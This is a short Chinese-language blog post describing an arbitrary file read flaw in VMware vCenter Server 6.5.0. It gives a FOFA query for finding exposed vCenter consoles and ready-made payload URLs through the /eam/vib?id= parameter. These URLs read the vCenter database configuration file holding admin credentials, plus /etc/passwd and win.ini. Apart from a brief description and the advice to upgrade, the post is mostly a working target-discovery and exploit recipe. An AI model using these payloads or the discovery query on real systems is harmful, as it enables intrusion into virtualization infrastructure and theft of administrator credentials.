spaceman'blog > VMware vCenter Server 任意文件读取

VMware vCenter Server 任意文件读取

2021-03-14

任意文件读取

VMware vCenter Server 任意文件读取

漏洞描述

VMware vCenter存在任意文件读取漏洞,远程攻击者通过访问开放在外部的vCenter 控制台,可以任意读取主机上的文件。(可读取 vCenter 配置文件获得管理帐号密码)进而控制 vCenter 平台及其管理的虚拟机集群。

影响版本

VMware vCenter Server 6.5.0 a至f版

资产查找

FOFA:

1
title="ID_VC_Welcome"

payload:

1
2
3
4
5
6
windows:
https://ip/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
https://ip/eam/vib?id=C:/windows/win.ini

linux:
https://ip/eam/vib?id=/etc/passwd

2016以上测试失败

image-20210314214337370

image-20210314214248469

image-20210314215504928

漏洞修复

升级版本